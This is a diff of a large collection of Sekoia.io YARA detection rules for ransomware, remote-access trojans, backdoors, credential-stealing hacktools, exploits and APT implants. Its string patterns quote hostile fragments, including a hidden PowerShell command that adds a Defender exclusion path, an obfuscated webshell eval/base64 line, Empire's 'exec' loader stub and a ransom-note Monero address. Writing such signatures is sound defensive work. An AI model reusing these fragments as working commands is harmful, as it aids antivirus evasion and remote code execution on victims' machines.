+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_dodo_2023.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725"
-		logic_hash = "41e1f97e45bc42ad3057cc173d036806687223782e54997e7803c888ee394b09"
-		score = 65
-		quality = 28
-		tags = ""
+		logic_hash = "01924360ef4bbecd220439290eba22838a3977793fdebd0ef0be74c342c0d152"
+		score = 75
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "aee45cc2540d49a28e765c30f1c4d0b853c1a74ea2260bd7614ece8e54c3bcb3"
 
 	strings:
-		$ = "& temp(Mid(" ascii fullword
-		$ = ".InnerHTML =" ascii fullword
-		$ = "peceert" ascii fullword
-		$ = "window.setTimeout" ascii fullword
-		$ = "cmdline = Split(" ascii fullword
+		$s1 = "DODOCRYPTER" ascii wide
+		$s2 = "dodov2" ascii wide
+		$s3 = "dodov2SPREAD.exe" ascii wide
+		$s4 = "dodov2_readit.txt" ascii wide
+		$s5 = "WELCOME, DODO has returned" ascii wide
+		$s6 = "Monero Address: 442n8nf9zojie1JdkZqxDQJFDumBEgZmVZozLdYd5jVPSMws2oUPvNLJKca6JKojyA7zDCZCnMyYnKbY1JLNsbzWK6HNNqW" ascii wide
+		$s7 = "The price for the software is $15. Payment can be made in Bitcoin or XMR." ascii wide
 
 	condition:
-		3 of them
+		uint16be( 0 ) == 0x4d5a and 4 of them
 }
-rule SEKOIA_Hacktool_Credentialkatz : FILE
+rule SEKOIA_Rat_Win_Arrow_Str : FILE
 {
 	meta:
-		description = "Finds ChromeKatz (CredentialKatz version) standalone samples based on the strings"
+		description = "Finds Arrow RAT samples based on the specific malware strings"
 		author = "Sekoia.io"
-		id = "4795d131-2625-40ca-bca6-02aac5030b55"
-		date = "2024-10-30"
+		id = "69f6572c-91ed-4fb6-b886-5ad2dabef3d3"
+		date = "2022-08-19"
 		modified = "2024-12-19"
-		reference = "https://github.com/Meckazin/ChromeKatz"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_credentialkatz.yar#L1-L34"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_arrow_str.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "2762e066128e186526c5ff272fc9184c0262d81d8c513e6515c25c189418931c"
-		logic_hash = "dbfc0a6e8ad6701a071cb76564a2aeb9924ff7f13306f5dca1e1045c51f07ae7"
+		logic_hash = "faf66a14e563066bb86ceadc787c092a5a13a43f936f0d9d19fbe7d4352ea5d8"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Don't use your cat's name as a password!" ascii
-		$str02 = "[-] Failed to parse command line argument /pid!" ascii
-		$str03 = "[*] Targeting process: %ls on PID: %lu" ascii
-		$str04 = "CredentialStore: NotSet" ascii
-		$str05 = "CredentialStore: AccountStore" ascii
-		$str06 = "CredentialStore: ProfileStore" ascii
-		$str07 = "[*] Number of available credentials: %zu" ascii
-		$str08 = "[+] Found browser process: %d" ascii
-		$str09 = "Failed to read credential struct" wide
-		$str10 = "Error reading right node" wide
-		$str11 = "Failed to read the root node from given address" wide
-		$str12 = "Error reading first node" wide
-		$str13 = "chrome.dll" wide
-		$str14 = "    Domain:" ascii
-		$str15 = "    Password:" ascii
-		$str16 = "Found %ls main process PID: %lu" ascii
-		$str17 = "---------------" ascii
-		$str18 = "CredentialKatz" ascii wide
+		$hvnc01 = "DESKTOP_JOURNALRECORD" ascii
+		$hvnc02 = "DESKTOP_ENUMERATE" ascii
+		$hvnc03 = "DESKTOP_SWITCHDESKTOP" ascii
+		$hvnc04 = "DESKTOP_CREATEWINDOW" ascii
+		$hvnc05 = "StartHVNC" ascii
+		$str01 = "U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c" wide
+		$str02 = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath" wide
+		$str03 = "cvtres.exe" wide
+		$str04 = "qbkTHriRRbQjaArtJfF" wide
+		$str05 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=" wide
+		$str06 = "Stub.exe" ascii wide
+		$str07 = "DePikoloData" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16be( 0 ) == 0x4d5a and 4 of ( $hvnc* ) and 5 of ( $str* )
 }
-rule SEKOIA_Rat_Darkvision_String : FILE
+rule SEKOIA_Backdoor_Lin_Sysupdate : FILE
 {
 	meta:
-		description = "DarkVision RAT based on string"
+		description = "Detect the SysUpdate malware"
 		author = "Sekoia.io"
-		id = "ab698a79-42ee-452a-a3ba-1a9872d5e2bc"
-		date = "2024-09-17"
+		id = "9cb806cf-4ca1-44d8-809a-58cc5f364fb8"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_darkvision_string.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_lin_sysupdate.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "8ec5526cecc596e0711c82e39cd4f2ce"
-		hash = "2dd476464e46d91ffe68483cb478d9b4"
-		hash = "20de7547d79d3637430b6a0787e59df5"
-		hash = "60d1e02316e6f22e078f9aa710790912"
-		hash = "e136e51efc22b0e071c11e7d652ea3be"
-		hash = "f466be81310147fcdd9a7886735a3786"
-		hash = "5065134cf4ba765bd97bb2edb61c5869"
-		hash = "6ed21c4f507e8cc830141ff732bd5acc"
-		hash = "40b2641150f291ca07bd08ab629fe1ed"
-		hash = "3f20cd14137e0abfa84b39e29a277350"
-		hash = "7dc8427be8b4d26a49fd380ad40d3b96"
-		logic_hash = "63ed3b1a991dc07bd06678a58449e0a67dd9453b358c0ac82a9c38235394122b"
+		logic_hash = "93e17cd535444e9cabc7440b1226526e67ddb81a84eb6377689a62f268b9dfee"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240653,83 +240471,81 @@ rule SEKOIA_Rat_Darkvision_String : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "DarkVision Installation" wide
-		$ = "You are about to install DarkVision Remote Access Tool." wide
+		$ = "generate guid path=%s"
+		$ = "3rd/asio/include/asio/detail/posix_event.hpp"
+		$ = "expires_at"
+		$ = "%s -f %s"
+		$ = "expires_after"
+		$ = "-run"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 2 of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-
-rule SEKOIA_Backdoor_Win_Minibike : FILE
+rule SEKOIA_Hacktool_Mimikat_Ssp_Strings : FILE
 {
 	meta:
-		description = "Detect the MINIBIKE malware"
+		description = "Detects mimikat_ssp"
 		author = "Sekoia.io"
-		id = "d758c41a-279c-4706-9cf3-87740e45f71d"
-		date = "2024-04-08"
+		id = "33b3620f-e02d-4d29-adcc-fea3b49ab780"
+		date = "2023-11-22"
 		modified = "2024-12-19"
-		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_minibike.yar#L4-L37"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_mimikat_ssp_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d09ab10aff629c6edafa7df640e98bcb6b2523a9bf4e2f2ca87f6694ccfe21bf"
+		logic_hash = "06325bf495963db90b14fb16a5f3eafda9e4554f753d04405af51c6041a9b166"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "985967e245d8fbc722e30371c9ed48c3269ceaa6b9b9b80caf2b95c920c856c2"
-		hash2 = "ab0b602665b609392eacdcbfc6c1981f216c19f21e2156a55cf9998eab02227b"
-		hash3 = "8e2429d70989bbdd2ea8842dce7c3d790ebe148490ee519b47767557f4a4a733"
-		hash4 = "be86b8559a84d97aa1cc9852e60a553f5164477bacfc69b7f3453ad37fb6fd2a"
-		hash5 = "78065411e7e8eb205ddae7215a229b7c93bdca5d628670f89caa982238ac7eb6"
-		hash6 = "73bf3a5877a7fe16544d15670e3ece034e4826323ba555b3527ad4d061f44ec4"
 
 	strings:
-		$ = "Mini-Junked.dll"
+		$ = "[*] Building RPC packet" ascii
+		$ = "[*] Connecting to lsasspirpc RPC service" ascii
+		$ = "[*] Sending SspirConnectRpc call" ascii
+		$ = "[*] Sending SspirCallRpc call" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them or pe.imphash ( ) == "75a9ae7d4394abdc30e2a873908fa09d" or hash.md5 ( pe.rich_signature.clear_data ) == "06b2ec5892ac9ad566693b04cf427f3f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "612006b6f68cd0b8b0d48252dbdef4be" )
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
 }
-rule SEKOIA_Exploit_Cve20191458_Strings : CVE_2019_1458 FILE
+rule SEKOIA_Suspicious_Users_Dev : FILE
 {
 	meta:
-		description = "Detects compiled exploit for CVE-2019-1458 (Generic)"
+		description = "Nirscord stealer"
 		author = "Sekoia.io"
-		id = "0be4a550-0f0a-4596-ab32-aafaececf919"
-		date = "2022-08-29"
+		id = "9e8af456-6f84-4922-a262-20b8f5c8a1eb"
+		date = "2022-12-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_cve20191458_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/suspicious_users_dev.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8e22a79b3d7dc45d63062c71909faee61584c71b6ea7353ba0f40c00745a2075"
-		score = 75
+		logic_hash = "6084b319efb7b4137517c63dd2ed1023a4b25513b7ac50e95154bbac0fea0af7"
+		score = 65
 		quality = 80
-		tags = "CVE-2019-1458, FILE"
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[-] Failed to create SploitWnd window"
-		$ = "[+] ProcessCreated with pid %d!"
-		$ = "[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx"
-		$ = "[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx"
-		$ = "[*] Simulating alt key press"
+		$user1 = "\\Users\\raghus1\\" ascii
+		$user2 = "\\Users\\drill\\" ascii
+		$key = {58 69 b3 5f b3 87 74 f6 65 eb 96 e7 6f 4d 16 83 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 6MB and 1 of ( $user* ) and $key
 }
-rule SEKOIA_Crime_Sload_Powershellarchiveexfiltrator_Strings : FILE
+rule SEKOIA_Hacktool_Ligolo_Relay_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Ligolo Relay based on strings"
 		author = "Sekoia.io"
-		id = "3934696a-2116-49cb-9f75-3740767ad6f3"
-		date = "2022-08-02"
+		id = "1e32f2e5-b66b-4b55-9dd4-1402b2f627ed"
+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_powershellarchiveexfiltrator_strings.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ligolo_relay_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "7d6234ced7e5915a5b27ce2065772c74adb5c2398a8c972421fb5ec6b1b7771f"
+		logic_hash = "57150b394cc7af9ae786b63d83acc29529fa037f0a52afde0e12a2eef93bf6c8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240737,80 +240553,55 @@ rule SEKOIA_Crime_Sload_Powershellarchiveexfiltrator_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "if ($wr1 -or $wr2){"
-		$ = "if ($zp1 -or $zp2){"
-		$ = "-join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_});"
+		$ = "ligolo/cmd/localrelay"
+		$ = "main.LigoloRelay.Start"
+		$ = "main.LigoloRelay.startRelayHandler"
+		$ = "main.LigoloRelay.startLocalHandler"
 
 	condition:
-		all of them and filesize < 1KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
 }
-rule SEKOIA_Tool_Ladon_Strings : FILE
+rule SEKOIA_Backdoor_Win_Rollsling : FILE
 {
 	meta:
-		description = "Detects Ladon based on strings"
+		description = "Detect Lazarus' RollSling malware (aka LazarLoader)"
 		author = "Sekoia.io"
-		id = "7f06f755-a103-4e74-a9df-136355775233"
-		date = "2024-06-03"
+		id = "5ef23b9c-5bc5-4f02-b1b4-1af18a03241a"
+		date = "2023-10-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_ladon_strings.yar#L1-L61"
+		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_rollsling.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6f2a34bddea2a2370c0a45cde888f51632689973373e3c6ba739a34dc220bfa1"
+		logic_hash = "5cee25638bdc86b3ffb1c616943d647ca170c5c0140ae3e3118f56b504fa862f"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca"
+		hash2 = "48538a935ddf2cbeb4918d0ccf9372ec8e0a57c5fd145a584a9b1bb4ebbcd5ce"
+		hash3 = "18825be6b269087d7699f3d0aa2e6db2ae72ded36c56aa8e7b8a606dde3741fa"
+		hash4 = "645205e38dfdd560f6242ba717af1bfdd8e85baf5e710d724b853fe9808c4551"
+		hash5 = "455bab490a300d9d63b8777c223287c0a6a647ca7b98b96fd3236f83b8adc77b"
 
 	strings:
-		$a1 = ".GetType('Ladon.Scan')"
-		$a2 = "= New-object Byte[]("
-		$a3 = "([IO.MemoryStream][Convert]::FromBase64String("
-		$b1 = "DeflateStream([IO.MemoryStream][Convert]::FromBase64String("
-		$b2 = "))}}}}}}}}}"
-		$b3 = "::Main(@($"
-		$b4 = "))} else {If("
-		$b5 = "= [Reflection.Assembly]::Load("
-		$c1 = "ChatLadon.Form1.resources"
-		$c2 = "ChatLadon.Properties.Resources.resources"
-		$c3 = "WebClientUploadEvent"
-		$c4 = "WebClientDownloadEvent"
-		$c5 = "K8robot"
-		$c6 = "K8IPselect"
-		$d1 = "loadASM"
-		$d2 = "ConsoleApp1.exe"
-		$d3 = "K8Ladon"
-		$e1 = "get_network_16px_1219919_easyicon_net"
-		$e2 = "K8gege"
-		$e3 = "LadonExpBuild"
-		$f1 = "Ladon url.txt CitrixVer"
-		$f2 = "Ladon MssqlCmd"
-		$f3 = "Example: Ladon "
-		$f4 = "k8gege.org"
-		$f5 = "K8crack"
-		$g1 = "LadonStudy.exe"
-		$g2 = "LadonStudy.frmMain.resources"
-		$g3 = "LadonStudy.Properties.Resources.resources"
-		$g4 = "K8gege"
-		$h1 = "LadonShell.exe" wide
-		$h2 = "ForceRemove"
-		$h3 = "GetUserObjectInformationA"
+		$s1 = "LookupPrivilegeVCreateRemoteThreAdjustTokenPriviOpenProcessToken"
 
 	condition:
-		( all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* ) or all of ( $e* ) or all of ( $f* ) or all of ( $g* ) or all of ( $h* ) ) and filesize < 5MB
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Tool_Win_Snap2Html : FILE
+rule SEKOIA_Apt_Kimsuky_Toddlershark_Strings : FILE
 {
 	meta:
-		description = "Finds Snap2HTML samples based on specific strings. Legitimate tool used by ransomware affiliates to perform discovery"
+		description = "Detects Kimsuky TODDLERSHARK vbs malware"
 		author = "Sekoia.io"
-		id = "9865daac-f23b-417e-813e-cbed03f45161"
-		date = "2024-02-08"
+		id = "2db1a424-9e83-4168-8ebf-d3b415b6a576"
+		date = "2024-03-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_win_snap2html.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_toddlershark_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8805a80193ba1323dffd68456833f27cc93f2182660a5047dbe69e8ed65ac184"
+		logic_hash = "dee9d03f498437dd6d8399975cd91ec44307067ac4642b9ff31df1a6d6b10468"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240818,35 +240609,28 @@ rule SEKOIA_Tool_Win_Snap2Html : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Snap2HTML.exe" fullword wide ascii
-		$str02 = "Snap2HTML.Properties" ascii
-		$str03 = "set_txtRoot" ascii
-		$str04 = "set_chkHidden" ascii
-		$str05 = "set_chkSystem" ascii
-		$str06 = "set_chkLinkFiles" ascii
-		$str07 = "set_txtLinkRoot" ascii
-		$str08 = "set_chkOpenOutput" ascii
-		$str09 = "set_txtTitle" ascii
-		$str10 = "get_CancellationPending" ascii
-		$str11 = "set_RootFolder" ascii
-		$str12 = "add_SettingsLoaded" ascii
+		$ = "On Error Resume Next"
+		$ = ".open \"POST\", \"http"
+		$ = ".setRequestHeader"
+		$ = ".send"
+		$ = "Execute("
+		$ = ".responseText)"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		all of them and filesize < 450
 }
-rule SEKOIA_Apt_Cerana_Keeper_Dropboxflop : FILE
+rule SEKOIA_Backdoor_Powershellempire_Python : FILE
 {
 	meta:
-		description = "Detects DropboxFlop malware"
+		description = "Detects Empire Python version"
 		author = "Sekoia.io"
-		id = "e077901f-3847-45f3-82cb-d52724cd3fb5"
-		date = "2024-10-04"
+		id = "c2913f60-46a2-42c1-8569-72568eaddaed"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cerana_keeper_dropboxflop.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_python.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "2b65b74e52fbf25cb400dbdfcd1a06a7"
-		logic_hash = "5b2dfdf0c35f574e7006bb3e6eafa10d0e7fc7d980d443b31d4d6d6b7cec2fce"
+		logic_hash = "81c74a73ff7fe02420f29a53b350f1b53964f5a04f0694fed5b1b4bd6cc5ad03"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240854,23 +240638,24 @@ rule SEKOIA_Apt_Cerana_Keeper_Dropboxflop : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<assemblyIdentity type=\"win32\" name=\"dropboxflop\""
+		$ = "import sys,base64;exec"
+		$ = "aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		all of them and filesize < 1MB
 }
-rule SEKOIA_Exploit_Linux_Eop_Polkit_Pkexec_Strings : FILE
+rule SEKOIA_Apt_Cloudatlas_Rtf_Shellcode_Cve_2018_0798 : FILE
 {
 	meta:
-		description = "Detects Polkit Local Privesc exploit"
+		description = "CloudAtlas Shellcode for CVE_2018_0798 "
 		author = "Sekoia.io"
-		id = "de45c29e-432a-4e4f-b700-a016341d56d2"
-		date = "2023-12-08"
+		id = "6c602c66-df40-4436-800f-e548dacc1e81"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_polkit_pkexec_strings.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_rtf_shellcode_cve_2018_0798.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "42d04204481c165ba1b5c4ee5ff1094c31400669b0eca041d736473d481e74b7"
+		logic_hash = "a8c320ca81ef196b84a8fb08d9e02ef8cfb338024fa7e6776ff6c8c049b8e63c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240878,30 +240663,23 @@ rule SEKOIA_Exploit_Linux_Eop_Polkit_Pkexec_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[.] Spawning suid process (%s) ..."
-		$ = "[.] Tracing midpid ..."
-		$ = "PTRACE_TRACEME local root (CVE-2019-13272)"
+		$s1 = "6060606061616161616161616161616161616161FB0B00004bE8FFFFFFFFC35F83C71B33C966B908010f0d00ddd8d97424f4668137" ascii nocase
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		filesize < 8MB and all of them
 }
-rule SEKOIA_Tool_Webshell_B374K_Strings : FILE
+rule SEKOIA_Apt_Mustangpanda_Downloader : FILE
 {
 	meta:
-		description = "Detects b374k webshell"
+		description = "Detects the MustangPanda Downloader"
 		author = "Sekoia.io"
-		id = "f53fc668-e1fc-4b85-b850-59aceefb6418"
-		date = "2024-09-06"
+		id = "54850ffd-f93b-4082-b3ca-8e1d60b35422"
+		date = "2022-03-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_webshell_b374k_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_downloader.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "1d27b23fceecbb9e854c41f6a8fb878e"
-		hash = "71fd853a3f3efc3dc2846e866187ee59"
-		hash = "187e001c32487d0d68197ddb7e7796c3"
-		hash = "6eac497dfc1020a8475e95542fad197e"
-		hash = "61c6a0bc15efa442853f04bb276ac96e"
-		logic_hash = "b085a50d50fc1fd06d6f75397cf1fa6fa1bc4a0d18b56ed3458990f4abde0632"
+		logic_hash = "0bff0ee2960ecfa29939720e7efacaa35359f4fe555ae160c674efebf29bf61e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240909,49 +240687,57 @@ rule SEKOIA_Tool_Webshell_B374K_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$func('$x','ev'.'al'.'("
-		$ = "(ba'.'se'.'64'.'_de'.'co'.'de($x)))"
+		$ = "Windows Api" wide nocase
+		$ = "200 OK" wide
+		$ = "200 ok" wide
+		$ = "mscoree.dll" wide
 
 	condition:
-		2 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Backoor_Win_Gobear
+rule SEKOIA_Apt_Apt31_Pakdoor : FILE
 {
 	meta:
-		description = "Detect the GoBear backdoor used by Kimsuky"
+		description = "Detects APT31 ORB implant - 2019/2021"
 		author = "Sekoia.io"
-		id = "f922bf1b-652e-4a2f-91e9-76ecd2e3bf6a"
-		date = "2024-02-13"
+		id = "463b8d0d-30f4-45ed-8f19-4b32436fbbf0"
+		date = "2021-10-11"
 		modified = "2024-12-19"
-		reference = "https://medium.com/s2wblog/kimsuky-disguised-as-a-korean-company-signed-with-a-valid-certificate-to-distribute-troll-stealer-cfa5d54314e2"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backoor_win_gobear.yar#L4-L18"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt31_pakdoor.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8ca2699058ded62cbf4b78040985a4e5ebce0a1ff94034206c81a4c8e91f479b"
+		hash = "1d60edb577641ce47dc2a8299f8b7f878e37120b192655aaf80d1cde5ee482d2"
+		logic_hash = "ef001e31b34761688f32ec767082d9d7f9fc4e4368d567eb64b66583bcb7fc78"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		version = "1.0"
+
+	strings:
+		$s1 = "mv -f %s %s ;chmod 777 %s"
+		$s2 = "GET /plain HTTP/1.1"
+		$s3 = "exc_cmd time out"
+		$s4 = "exc_cmd pipe err"
+		$s5 = { 2e 2f [1-10] 20 20 64 65 6c }
 
 	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "668031f53390dc749971888029911c12d4171534f77c17a962e698bf121d0e20" )
+		int32be ( 0 ) == 0x7f454c46 and filesize < 800KB and filesize > 400KB and 4 of ( $s* )
 }
-
-rule SEKOIA_Loader_Win_Abcloader : FILE
+rule SEKOIA_Apt_Gelsemium_Wolfsbane_Rootkit : FILE
 {
 	meta:
-		description = "Detect ABCloader"
+		description = "Detects Gelsemium's WolfsBane rootkit"
 		author = "Sekoia.io"
-		id = "c286ce75-a041-478e-a567-4bf1d5e66c01"
-		date = "2024-08-19"
+		id = "e93f4515-62f5-4057-a464-aae11cbe0639"
+		date = "2024-11-22"
 		modified = "2024-12-19"
-		reference = "https://nsfocusglobal.com/new-apt-group-actor240524-a-closer-look-at-its-cyber-tactics-against-azerbaijan-and-israel/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_abcloader.yar#L4-L28"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gelsemium_wolfsbane_rootkit.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "0d1dca5eaad49c2dbd979e1bf0b5f8d0"
-		hash = "9a640889e82407b06c546fea15be668f"
-		logic_hash = "64d171d31c2f03ac18dde61d5b57fba91448045404b0ff619fb8cd437a561b1f"
+		hash = "ba08e63ad65a9bdcdb1655f25d32c808"
+		logic_hash = "a7440e1b4c0bbff0d80d7152e3bfb0867abe9b0151b45f88aa656f3c9a55b303"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -240959,24 +240745,29 @@ rule SEKOIA_Loader_Win_Abcloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "qSii.LI4"
-		$ = "Cabinet.dll"
